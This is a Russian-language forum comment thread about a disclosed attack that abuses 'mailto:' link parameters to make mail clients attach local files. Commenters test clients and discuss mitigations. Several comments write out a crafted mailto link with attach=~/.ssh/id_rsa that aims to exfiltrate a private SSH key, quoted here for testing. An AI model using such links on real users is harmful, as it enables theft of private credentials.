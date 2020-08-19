Атака на пользователей почтовых клиентов при помощи ссылок "mailto:"

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|1.1, jfdbngh (?), 14:41, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+10 +/–
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Если каждый китаец наберет случайную строку на клавиатуре, то с 99% вероятностью получится эксплоит.
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|1.3, Аноним (3), 14:46, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+3 +/–
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>Пять из двадцати рассмотренных почтовых клиентов
Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.
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|3.21, Аноним84701 (ok), 15:25, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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> outlook
> R4: Certificates are automatically imported, thereby replacing old ones
> что позволяет атакующему организовать подмену уже сохранённых у пользователя открытых ключей.
Так себе "альтернатива".
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|2.20, Аноним84701 (ok), 15:23, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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>>Пять из двадцати рассмотренных почтовых клиентов
> Сестра! Список! Хочу НОРМАЛЬНУЮ альтернативу Thunderbird/Evolution/Claws.
Claws-то чем провинился?
> O2: Drafts are saved unencrypted even though encryption is enabled
> E1: The attach parameter of mailto URIs is not supported.
>
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|3.59, Аноним (59), 20:35, 19/08/2020 [^] [^^] [^^^] [ответить]
|+/–
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> The attach parameter of mailto URIs is not supported.
Как это not supported? Только что проверил: приаттачивает, но выводит об этом сообщение, которое невозможно не заметить. Ключик ssh аттачить отказался, мол potential private data leak.
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|3.33, Siborgium (ok), 17:18, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Тормозное и глючное Goвно. Зря Drew DeVault изменил сишке, авось лучше бы получилось. Пользовался примерно неделю, вообще не понравилось. (neo)mutt, и тот лучше.
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|4.7, Ag (ok), 14:56, 19/08/2020 [^] [^^] [^^^] [ответить]
|+7 +/–
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На значит на этой машине не повезло, ждем-с другую. Интернет-с - он большой.
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|5.9, Аноним (4), 14:59, 19/08/2020 [^] [^^] [^^^] [ответить]
|–3 +/–
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Так это глупо - отвечать на письма от незнакомых адресатов. Их в спам помещают или игнорируют.
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|6.53, Аноним (53), 20:07, 19/08/2020 [^] [^^] [^^^] [ответить]
|+2 +/–
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Почему сразу "не знакомых"? А может знакомых. Может это какой-то магазин офигительных товаров и скидок куда пользователь пишет письмо т.к. на сайте написано "напишите нам и мы отправим вам товар". Пользователь пишет, ему в ответ приходит "ваш товар готов к отправке, вам удобно получить товар на этой или на следующей неделе" и вот в этом письме mailto.
Почему все думают что самые умные?
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|5.12, Аноним (4), 15:01, 19/08/2020 [^] [^^] [^^^] [ответить]
|+/–
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> Thunderbird позволяет прикреплять группы файлов
И глупо отправлять послание, не взглянув на окошко со списком вложений.
Так что проблема скорее не реализации и не протокола даже, а опять социальная.
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|4.11, Иваня (?), 15:01, 19/08/2020 [^] [^^] [^^^] [ответить]
|–1 +/–
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~$ cat ~/.ssh/id_rsa
cat: /home/Иваня/.ssh/id_rsa: No such file or directory
~$ cd ~/.ssh/id_rsa
bash: cd: /home/Иваня/.ssh/id_rsa: No such file or directory
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|5.27, ss (??), 16:11, 19/08/2020 [^] [^^] [^^^] [ответить]
|+3 +/–
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Вы просто не участвуете соревновании. Спокойно игнорируйте :)
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|2.34, Siborgium (ok), 17:29, 19/08/2020 [^] [^^] [^^^] [ответить]
|–1 +/–
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OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?
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|3.38, Michael Shigorin (ok), 18:31, 19/08/2020 [^] [^^] [^^^] [ответить]
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Вас никто не заставляет ключи openssh держать в файлах с предсказуемыми именами (да и путями тоже). Это превратит почти неинтерактивную атаку с одним-единственным элементом социнжиниринга ("лишь бы не заметил список приложений") в как минимум двухстадийную целенаправленную при необходимости её успеха -- сперва надо выкрасть ~/.ssh/config и посмотреть IdentityFile.
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|3.40, Аноним84701 (ok), 18:49, 19/08/2020 [^] [^^] [^^^] [ответить]
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> OpenSSH принципиально отказывается менять каталог. Что теперь делать, об стенку разбиться?
Классическое решение:
запускать браузер от другого пользователя (например, <name>surfer), у которого доступ в "основной" ~ есть только в ~/downloads
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|1.17, тоже Аноним (ok), 15:14, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+3 +/–
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Создал файл со ссылкой
mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa
Щелкнул. Открылся Thunderbird, подставил Title и Text... и не прикрепил никаких вложений, хотя такой файл есть.
Версия 68.10 - по информации в статье, "уязвимая".
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|2.25, ss (??), 15:54, 19/08/2020 [^] [^^] [^^^] [ответить]
|+/–
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Может чтобы оно сработало надо плагин поставить?
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|3.29, тоже Аноним (ok), 16:21, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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> Может чтобы оно сработало надо плагин поставить?
Ага, предварительно скомпилировав.
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|4.30, ss (??), 16:22, 19/08/2020 [^] [^^] [^^^] [ответить]
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Предварительно пропатчив авторскими фиксами после посылки багрепорта...
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|5.36, Аноним (36), 17:52, 19/08/2020 [^] [^^] [^^^] [ответить]
|+4 +/–
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Да ну нфиг слишком сложно пишите просто сразу куда слать этот ~/.ssh/id_rsa файл?
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|2.32, Аноним (32), 16:52, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Мои эксперименты с kmail дали такой результат: оно действительно пытается приложить файл, но это всегда заканчивается ошибкой "файл не существует". Хотя я проверял на тех файлах, что 100% существуют и доступны.
При этом, в окне редактирования письма горит огромная красная надпись, что вложения были добавлены внешней программой, и нужно их проверить.
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|3.37, sergey (??), 18:03, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.
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|4.41, тоже Аноним (ok), 19:25, 19/08/2020 [^] [^^] [^^^] [ответить]
|+1 +/–
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> Нужно путь к файлу без тильды писать, тогда существует. Но большая красная надпись всё равно горит.
Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.
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|6.49, тоже Аноним (ok), 19:53, 19/08/2020 [^] [^^] [^^^] [ответить]
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> /root/.ssh/id_rsa
Во-первых, это не мой. Во-вторых,
$ cat /root/.ssh/id_rsa
cat: /root/.ssh/id_rsa: Permission denied
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|5.52, Аноним (52), 20:06, 19/08/2020 [^] [^^] [^^^] [ответить]
|+/–
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>Вы можете написать путь к моему ~/.ssh/id_rsa без тильды? Ну-ка, попробуйте.
Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.
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|6.57, тоже Аноним (ok), 20:18, 19/08/2020 [^] [^^] [^^^] [ответить]
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> Да, легко: .ssh/id_rsa будет обработано как ~/.ssh/id_rsa. Хотя возможно если для программы установлена какая-то другая рабочая директория, то тогда путь развернется в другой файл. Проверять это я, конечно же, не буду.
Ну, это же так несложно. Достаточно поправить данную мной выше ссылку прямо в браузере, щелкнуть... и убедиться, что оно таки по-прежнему не работает.
Хотя pwdx 'pgrep thunderbird' таки показывает домашнюю папку текущего пользователя.
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|3.42, Bdfybec (?), 19:32, 19/08/2020 [^] [^^] [^^^] [ответить]
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> вложения были добавлены внешней программой
Что за внешняя программа?
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|4.54, Sluggard (ok), 20:08, 19/08/2020 [^] [^^] [^^^] [ответить]
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Видимо, подразумевается программа, в которой открывалась ссылка «mailto:» — она ведь передала параметр «attach».
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|2.63, Аноним (63), 21:24, 19/08/2020 [^] [^^] [^^^] [ответить]
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Mailspring (snap):
?to=user@example.com&subject=Title&body=Text&attach=~/.ssh/id_rsa could not be found, or has invalid file permissions.
Файл есть, а доступа нет. Я ничего не менял специально. К любым другим тоже не доступа у него.
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|4.67, Аноним (59), 22:38, 19/08/2020 [^] [^^] [^^^] [ответить]
|+/–
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И что, им теперь надо научиться разбирать URL для всех схем со всеми возможными параметрами и начать подменять их?
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|2.47, kusb (?), 19:50, 19/08/2020 [^] [^^] [^^^] [ответить]
|+2 +/–
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Почему дыра? Это часть стандарта?
Получается, что это заявленная возможность, так?
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|1.45, Аноним (45), 19:39, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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>специально оформленные документы PDF - действие OpenAction в PDF позволяет автоматически запустить обработчик mailto при открытии документа:<
вот это неприятно
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|1.46, kusb (?), 19:47, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
|+/–
Для того, чтобы отправить файл на наш сервис переименуйте его в send txt и распо... большой текст свёрнут, показать
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|1.55, timur.davletshin (ok), 20:08, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
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Стандартный Evolution из Debian stable прикрепляет и выводит в шапке письма предупреждение о том, что файл из скрытого каталога и может содержать приватную информацию. Т.е. сказать, что совсем об этом никто никогда не думал, нельзя.
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|3.64, timur.davletshin (ok), 21:30, 19/08/2020 [^] [^^] [^^^] [ответить]
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А так и было задумано... Вообще, я не вижу ничего критичного в таком поведении. Кнопку "Send" за меня оно не нажимает и ладно. Если пользователь настолько олень, что не смотрит, что отправляет, то это его личные проблемы.
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|1.62, Аноним (62), 21:03, 19/08/2020 [ответить] [﹢﹢﹢] [ · · · ]
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Спалил контору =(((( ну по крайне мере последние лет 5 это стабильно работало. и да Хелло html2pdf, dompdf и рукожопы 97% ;)
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